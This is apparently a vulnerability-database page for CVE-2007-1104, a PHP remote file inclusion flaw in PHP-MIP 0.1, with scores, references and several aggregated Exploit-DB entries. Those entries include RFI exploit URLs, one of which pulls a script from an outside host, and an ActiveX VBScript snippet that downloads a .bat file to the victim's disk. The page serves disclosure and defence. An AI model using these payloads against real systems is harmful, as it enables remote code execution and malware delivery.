CVE-2007-1104
published 2007-02-26CVE-2007-1104: PHP remote file inclusion vulnerability in top.php in PHP Module Implementation (PHP-MIP) 0.1 allows remote attackers to execute arbitrary PHP code via a URL…
PriorityP431medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
2.32%
81.3th percentile
PHP remote file inclusion vulnerability in top.php in PHP Module Implementation (PHP-MIP) 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the laypath parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php_mip | php_mip | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Apple iOS 7.0.2 - Sim Lock Screen Display Bypass
exploitdb·2013-10-15
CVE-2013-5147 Apple iOS 7.0.2 - Sim Lock Screen Display Bypass
Apple iOS 7.0.2 - Sim Lock Screen Display Bypass
---
Document Title:
Apple iOS 7.2 - Sim Lock Screen Display Bypass Vulnerability
References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1105
Video: http://www.vulnerability-lab.com/get_content.php?id=1104
Release Date:
2013-10-04
Vulnerability Laboratory ID (VL-ID):
1105
Common Vulnerability Scoring System:
6.1
Product & Service Introduction:
iOS (previously iPhone OS) is a mobile operating system developed and distributed by Apple Inc. Originally unveiled in 2007
for the iPhone, it has been extended to support other Apple devices such as the iPod Touch (September 2007), iPad (January 2010),
iPad Mini (November 2012) and second-generation Apple TV (September 2010). Unlike Microsoft`s Windows Phone and Google`s
Exploit-DB
EDraw Flowchart ActiveX Control 2.0 - Insecure Method
exploitdb·2007-11-02
CVE-2007-5826 EDraw Flowchart ActiveX Control 2.0 - Insecure Method
EDraw Flowchart ActiveX Control 2.0 - Insecure Method
---
EDraw Flowchart ActiveX Control (EDImage.ocx v. 2.0.2005.1104) "HttpDownloadFile()" Insecure Method
url: http://www.anydraw.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
Sub tryMe
On Error Resume Next
test.HttpDownloadFile "http://www.shinnai.altervista.org/shinnai.bat", "c:\shinnai.bat"
MsgBox("Exploit completed!")
End Sub
# milw0rm.com [2007-11-02]
Exploit-DB
PHP-MIP 0.1 - 'top.php?laypath' Remote File Inclusion
exploitdb·2007-02-25
CVE-2007-1104 PHP-MIP 0.1 - 'top.php?laypath' Remote File Inclusion
PHP-MIP 0.1 - 'top.php?laypath' Remote File Inclusion
---
PHP Module Implementation(top.php laypath)Remote File Include Vul ^
Downlaoad S : http://sourceforge.net/projects/phpmip/ ^
Author: GolD_M = [Mahmood_ali] && Contact: [email protected] ^
In: /[path]/top.php ^
Vulnerable Code: ^
include("$laypath/body.php"); Line : 23 ^
Exploit: ^
http://Victim.Com/top.php?laypath=[Shell] ^
# milw0rm.com [2007-02-25]
Exploit-DB
PHPMyphorum 1.5a - '/mep/frame.php' Remote File Inclusion
exploitdb·2007-01-17
CVE-2007-0361 PHPMyphorum 1.5a - '/mep/frame.php' Remote File Inclusion
PHPMyphorum 1.5a - '/mep/frame.php' Remote File Inclusion
---
#########################################################################
# #
# [ PHPMyphorum 1.5a ] #
# #
# Class: File Include Vulnerability #
# Published 2007/1/17 #
# Remote: Yes #
# Critical Level : Dangerous #
# Site: http://www.comscripts.com/scripts/php.phpmyphorum.1104.html#
# Author: TheViper-hacker #
# Contact: [email protected] #
# #
#########################################################################
file ;
frame.php
Vuln Code
include("$chem/session/cookie_sys_verif.php");
Exploit :
Http:// www.Victem.0 / [Comment IT_path] /mep/frame.php?chem=http://turnkringonzehoop.be/viper.txt?
---- Thanx: [MoHaNdKo] [Cold ThreE] [cold zero] [The Wolf KSA] ]organza[
---- GreeTz: All www.4azhar.Com Members Cont
No writeups or analysis indexed.
http://osvdb.org/36881http://www.securityfocus.com/bid/22714http://www.vupen.com/english/advisories/2007/0732https://exchange.xforce.ibmcloud.com/vulnerabilities/32672https://www.exploit-db.com/exploits/3374http://osvdb.org/36881http://www.securityfocus.com/bid/22714http://www.vupen.com/english/advisories/2007/0732https://exchange.xforce.ibmcloud.com/vulnerabilities/32672https://www.exploit-db.com/exploits/3374
2007-02-26
Published